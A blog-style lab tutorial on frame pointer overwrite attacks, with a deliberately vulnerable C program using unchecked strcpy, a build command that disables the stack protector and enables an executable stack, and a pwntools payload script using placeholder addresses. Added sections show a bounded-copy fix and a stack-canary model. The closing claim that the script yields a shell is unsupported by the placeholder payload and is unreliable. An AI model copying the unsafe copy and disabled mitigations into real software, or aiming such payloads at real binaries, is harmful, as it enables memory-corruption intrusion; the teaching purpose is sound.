strangerRidingCaml

System hacking

Frame Pointer Overwrite Attacks Lab

woddlwoddl 2024. 5. 7. 17:26

In this lab, we will learn how to exploit vulnerabilities to overwrite frame pointers and gain control of program flow.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
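For contrast, here is a hardened counterpart of vulnerable_function(). This is an added example written for this page, not code from the original post: the copy is performed only when the input, including its terminator, fits the destination, so an over-long argument is rejected instead of being written over the saved frame pointer and return address. The function names copy_bounded and safe_function are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

/* Hardened counterpart of the lab's vulnerable_function(): the copy happens
 * only when the input, including its NUL terminator, fits the destination.
 * Returns 0 on success and -1 (leaving dst untouched) when the input is
 * too long. The caller passes the real buffer size, so the check cannot
 * drift away from the array declaration. */
int copy_bounded(char *dst, size_t dst_len, const char *input) {
    size_t n = 0;
    /* Scan at most dst_len bytes, so an unterminated input cannot run past the end. */
    while (n < dst_len && input[n] != '\0') {
        n++;
    }
    if (n == dst_len) {
        /* Either longer than dst_len - 1 characters or unterminated: refuse
         * instead of truncating silently, which would hide the misuse. */
        return -1;
    }
    memcpy(dst, input, n + 1);   /* n characters plus the terminator */
    return 0;
}

/* Same shape as the lab's function, but an over-long argument is rejected
 * rather than spilling into the saved frame pointer and return address. */
int safe_function(const char *input) {
    char buffer[BUF_SIZE];
    if (copy_bounded(buffer, sizeof buffer, input) != 0) {
        fprintf(stderr, "input rejected: at most %d characters allowed\n", BUF_SIZE - 1);
        return -1;
    }
    printf("copied %zu characters\n", strlen(buffer));
    return 0;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    return safe_function(argv[1]) == 0 ? 0 : 2;
}
```

Build it without the two flags the lab disables, for example gcc -fstack-protector-strong -o safe safe.c: the bounded copy removes the bug, and the stack protector and a non-executable stack remain as defence in depth should another unchecked copy appear later.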

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to exploit the frame pointer overwrite vulnerability.

  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of function to return to
  return_address = 0xdeadbeef  # Example address (change as needed)

  # Offset from the start of buffer[64] to the saved frame pointer
  # (64 bytes of buffer plus compiler alignment padding; confirm it in a debugger)
  offset = 72

  # Fake frame pointer value
  fake_ebp = 0xdeadbeef  # Example value (change as needed)

  # Craft the payload: padding, then the saved frame pointer slot, then the return address slot
  payload = b'A' * offset
  payload += p32(fake_ebp)  # Fake frame pointer
  payload += p32(return_address)  # Return address

  # Launch the exploit. The program reads its input from argv[1], not from stdin,
  # so the payload is passed as the command-line argument (it must contain no NUL bytes).
  p = process([binary_path, payload])
  p.interactive()

Explanation of the Python script:

  • We specify the address of the function to return to and the fake frame pointer value.
  • The payload consists of padding up to the saved frame pointer, followed by the fake frame pointer value and the return address.
  • We launch the vulnerable binary with the payload as its command-line argument (the program reads argv[1]) to trigger the frame pointer overwrite.
  • p.interactive() allows us to interact with the spawned shell.
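To make the layout above concrete, and to show why the lab has to compile with -fno-stack-protector, here is an added example (not part of the original post) that models the 32-bit frame the script assumes as an ordinary C struct: buffer[64], alignment padding, the saved frame pointer at offset 72 and the return address at offset 76. A guard slot sits between the buffer and the saved frame pointer, where the compiler's stack protector places its canary; writing the script's 80-byte layout into the model clobbers that guard, which is what the protector's pre-return check catches. The canary constant and the saved placeholder values are constructed for this example, and the struct names are assumptions; the memcpy is clamped to the struct so the model itself never writes out of bounds.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the 32-bit frame the lab script assumes: buffer[64], alignment
 * padding, saved frame pointer at offset 72, return address at offset 76.
 * The canary slot is where -fstack-protector puts its guard; the lab build
 * (-fno-stack-protector) has no such slot, which is why the overwrite goes
 * unnoticed there. This is an ordinary struct, not the real stack, so the
 * "overflow" below is a memcpy that stays inside one object. */
#define CANARY_VALUE 0x0ff1ce00u   /* constructed; a real guard is random per process */

struct frame_model {
    uint8_t  buffer[64];   /* char buffer[64] in vulnerable_function() */
    uint32_t canary;       /* guard slot, checked before the function returns */
    uint8_t  align[4];     /* compiler padding: 64 + 4 + 4 = 72, the script's offset */
    uint32_t saved_fp;     /* saved frame pointer (offset 72) */
    uint32_t ret;          /* return address (offset 76) */
};

/* Fresh frame with constructed saved values. */
void init_frame(struct frame_model *f) {
    memset(f, 0, sizeof *f);
    f->canary = CANARY_VALUE;
    f->saved_fp = 0x1000u;   /* constructed placeholder for the caller's frame pointer */
    f->ret = 0x2000u;        /* constructed placeholder for the return address */
}

/* Copy with no length check against buffer[], the way strcpy behaves; bytes
 * beyond 64 spill into the following slots. (Clamped to the struct size only
 * so the model itself never writes out of bounds.) */
void unchecked_copy(struct frame_model *f, const uint8_t *src, size_t len) {
    memcpy(f, src, len < sizeof *f ? len : sizeof *f);
}

/* The check the stack protector performs before returning: 1 if the guard
 * is intact, 0 if it was overwritten (the real check aborts the process). */
int canary_intact(const struct frame_model *f) {
    return f->canary == CANARY_VALUE;
}

/* Reproduce the script's layout: 72 padding bytes, fake fp, return address,
 * each 4-byte value in host byte order (little-endian on x86, as p32 emits). */
size_t build_layout(uint8_t *out, uint32_t fake_fp, uint32_t ret_addr) {
    memset(out, 'A', 72);
    memcpy(out + 72, &fake_fp, sizeof fake_fp);
    memcpy(out + 76, &ret_addr, sizeof ret_addr);
    return 80;
}

int main(void) {
    uint8_t payload[80];
    struct frame_model f;
    size_t n = build_layout(payload, 0xdeadbeefu, 0xdeadbeefu);

    init_frame(&f);
    unchecked_copy(&f, payload, n);
    printf("saved_fp=0x%08x ret=0x%08x canary=0x%08x -> %s\n",
           f.saved_fp, f.ret, f.canary,
           canary_intact(&f) ? "guard intact" : "guard corrupted, return aborted");
    return 0;
}
```

Run stand-alone it reports the guard as corrupted: the 'A' padding lands on the canary slot before the fake frame pointer and return address reach their slots, so a protected build never returns through the overwritten pointer. That is the mitigation the lab turns off, and it is worth checking for on any binary you assess (for example, whether the compiler emitted stack-protector checks and whether the stack is marked executable).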

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful exploitation of the frame pointer overwrite vulnerability.
